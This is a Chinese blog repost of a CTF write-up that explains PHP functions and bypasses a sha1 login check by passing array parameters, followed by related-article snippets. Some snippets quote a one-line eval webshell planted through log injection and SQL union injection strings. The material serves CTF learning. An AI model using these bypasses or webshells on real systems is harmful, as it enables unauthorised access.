CTF-Web24(涉及PHP代码审计,较简单)

最新推荐文章于 2024-06-15 21:32:12 发布
最新推荐文章于 2024-06-15 21:32:12 发布
阅读量545 收藏 2
点赞数
分类专栏: CTF-Web
原文链接:https://www.cnblogs.com/ssooking/p/5869784.html
版权

24.FALSE

分析:

PHP函数

isset() 检测变量是否设置

只能用于变量,传递任何其它参数都将造成解析错误。若想检测常量是否已设置,可使用 defined() 函数

 格式:  isset ( mixed var [, mixed var [, ...]] ) 

    若变量不存在则返回 FALSE 
    若变量存在且其值为NULL,也返回 FALSE 
    若变量存在且值不为NULL,则返回 TURE 

    同时检查多个变量时,每个单项都符合上一条要求时才返回 TRUE,否则结果为 FALSE

 

== : 比较运算符号  不会检查条件式的表达式的类型

===:  恒等计算符 , 同时检查表达式的值与类型。(会检查表达式类型,如bool)

die()函数  :  停止程序运行,输出内容

sha1()函数: 计算字符串 "Hello" 的 SHA-1 散列。默认的传入参数类型是字符串型

W3School: http://www.w3school.com.cn/php/func_string_sha1.asp

分析源码:

<?php
if (isset($_GET['name']) and isset($_GET['password'])) {
    if ($_GET['name'] == $_GET['password'])
        echo '<p>Your password can not be your name!</p>';
    else if (sha1($_GET['name']) === sha1($_GET['password']))
      die('Flag: '.$flag);
    else
        echo '<p>Invalid password.</p>';
}
else{
    echo '<p>Login first!</p>';
?>

登录成功条件:

(1)传入name,password的值

(2)name和password的值不能相等

(3)  name和password的sha1加密散列值相等

前两个条件容易实现,关键是第三个条件,怎样实现呢?

思路: sha1()函数默认的传入参数类型是字符串型,可以传入其他类型,使其返回值为false。如数组类型。

注意到源码是等号,不能用弱类型判断

<?php
    var_dump(sha1('aaroZmOk')===sha1('aaK1STfY'));      //bool(false)
    var_dump(sha1('aaroZmOk')==sha1('aaK1STfY'));       //bool(true)
?>

var_dump() 方法,判断一个变量的类型与长度,并输出变量的数值,如果变量有值,则输出是变量的值,并返回数据类型。

应该利用false===false

md5 和 sha1 无法处理数组,但是 php 没有抛出异常,直接返回 fasle

sha1([]) === false
md5([]) === false

实现:

构造url:  http://ctf4.shiyanbar.com/web/false.php?name[]=a&password[]=b (a,b只要不等即可),提交即可获得flag

得到:

本文做了部分修改,先看原文直接去https://www.cnblogs.com/ssooking/p/5869784.html

红烧兔纸
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Writeup】Boston Key Party CTF 2015(部分题目)
企鹅学coding~
03-05 1万+
假期试着做了一下这场美国的CTF比赛,无奈题目看了一遍都没什么想法,只好等比赛结束再学习了。在这里总结一下通过此次比赛学到的姿势。 以下是六道php代码审计题目。 1.Prudential   I don‘t think that sha1 is broken. Prove me wrong. 代码如下: level1 <?php require 'flag.p
bugkuctf解题-WEB
05-04
CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
CTF论剑场web题目(持续更新)--WEB24
jiuyongpinyin的博客
07-25 396
web24 打开页面,是个购物网站,点了点搜索,发现没啥用,查看源码: 在源码的最下面,发现了这个,登陆尝试,发现是一个代码审计,好吧,又是我不会的题: 我只知道这里是让我们对var这个变量先序列化,再进行base64的编码,参考了大佬的write up 参考链接:https://blog.csdn.net/weixin_45940434/article/details/104050262 再次感谢大佬!!! 构造代码: <?php class Small_white_rabbit{ p
CTF_ctfshow_meng新_web1-web24
weixin_54227009的博客
05-15 1431
打开靶机,发现包含有个config.php文件,打开进去没有数据 所以直接开始代码审计吧~ 有个变量为id,参数必须为1000才能获得flag,但id>999直接返回退出了。 尝试一下sql注入 整形注入: 看一下回显点 回显点为三 版本:10.3.18-MariaDB 数据库:web1 ?id=2 union select 1,2,database()# 表:article ?id=2 union select 1,2,group_concat.
CTFshow之RCE代码命令远程执行第29关到第40关详细讲解。一定教会
最新发布
2301_77578012的博客
06-15 376
CTFshow之RCE代码命令远程执行第29关到第40关详细讲解。包教包会
BUUCTF [web专项24][ZJCTF 2019]NiZhuanSiWei
yanglinchiji的博客
11-06 93
注意:一定不要再用伪协议获得useless.php的base64编码内容了,而且还要指明文件是useless.php,否则会被顶掉内容。将其修改变量file后并添加输出后,进行序列化操作,再传输给password让其输出。还记得前面的截图吗,在后面会有一个反序列化操作,那么我们就可以利用该代码。获取结果后,将其传给password。3.这道题是有序列化和反序列化的。出现base64码,解码后,得到。1.需要给text传输一句话。进行正则匹配,禁止出现flag。接下来,尝试伪协议查看。参考他人wp后,发现。
ctf-攻防世界-web:simple_php
一只菜鸟的博客
11-07 745
打开后是一段很简短的PhP代码,让我来剖析一下: 以get形式传入a,b的值,要求:a等于零还不能为0,b不能是数字但要大于1234. 那我们将传入a=a00&b=12345a即可获得flag 这就需要一点点代码知识了。 php的弱类型比较:(以下内容来源于网络,来源不可考,侵删) PHP是一种弱类型的语言,对于数字0和空字符串在进行布尔运算的时候都会转换为false; ==会自动转换类型然后进行比较,比如字符串'0'和数字0比较的时候会返回true; 而...
网络安全+CTF+源码审计+O泡易支付V1.zip
11-19
源码审计是网络安全中的一个重要环节,它涉及到对软件源代码的深度分析,以发现潜在的安全漏洞、不安全的编程实践或者设计缺陷。对于CTF比赛来说,源码审计可以帮助参赛者找到攻击入口点,从而解决挑战。在这个O泡易...
ctf-challenge:平时收集的ctf译文
02-14
2. **代码审计**:理解PHP语法和函数是解决PHP相关CTF挑战的关键。参赛者需要对PHP的常见函数如`eval()`、`include()`、`require_once()`等进行深入审计,查找潜在的安全风险。 3. **文件系统操作**:PHP可以与...
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
提示参赛者需要获取服务器的命令执行权限,可能涉及命令注入、PHP代码注入等技术,以实现远程控制。 3. **bugku-ctf 第三题:多次** 可能涉及到时间基的漏洞,如时间盲注,需要参赛者多次尝试以确定数据库查询的...
信息安全_web狗的生存之道.腹黑.pptx
08-14
本讲座主要围绕Web安全的几个核心主题展开,包括SQL注入、代码审计、文件上传等,并探讨如何巧妙地绕过防御机制。 1. **SQL注入**: SQL注入是Web应用中最常见的安全漏洞之一,攻击者通过输入恶意SQL语句来获取...
shal()函数绕过和session验证绕过
giun的博客
04-18 2745
一、shal()函数绕过 <?php $flag = "flag"; if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password can not be your name!...
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 938
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
ctf == php,CTF-Web15(涉及PHP代码审计-简单
weixin_39902085的博客
03-23 235
CTF-Web15(涉及PHP代码审计-简单)CTF-Web15(涉及PHP代码审计-简单)15.Once More随便输入一个密码,check,显示:Invalid password点击“View the source code”查看到如下源码if (isset ($_GET['password'])) {if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']...
WgpSec(狼组安全) CTF PHPCode题目记录
e6678的博客
03-23 1469
PHPCode strcmp 题目描述 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0; 如果 str1大于 str2返回 > 0;如果两者相等,返回 0。 //比较两个字符串(区分大小写) die('Flag:
php代码安全吗,PHP代码安全杂谈
weixin_33803878的博客
03-11 358
虽然PHP是世界上最好的语言,但是也有一些因为弱类型语言的安全性问题出现。WordPress历史上就出现过由于PHP本身的缺陷而造成的一些安全性问题,如CVE-2014-0166 中的cookie伪造就是利用了PHP Hash比较的缺陷。 当然一般这种情况实战中用到的不是很多,但是在CTF竞赛中却是一个值得去考察的一个知识点,特此记录总结之。一、精度绕过缺陷理论在用PHP进行浮点数的运算中,经常...
刷题之旅第24站,CTFshow web4
cc菜的一批
02-17 1524
感谢ctf show平台提供题目 老套路使用php伪协议 已经不行了。 那么我们进行 日志注入 获取shell 输入一下默认目录,得到了日志文件 ?url=/var/log/nginx/access.log 写入一句话 <?php @eval($_POST['pass']);?> 使用burp进行一下改包,不然写入的一句话会被进行url编码。 打开AntSword工具,进行连...
ctfshow-Web入门-29~36wp
yutianovo的博客
09-05 1920
Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数 了解 eval函数之后 传入 ?c=echo "Y2my";?>ctf <?php system('ls');
代码审计----bugku
小白的劝退之路
05-12 293
1.extract变量覆盖 <? php$flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } }?> Ex...
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值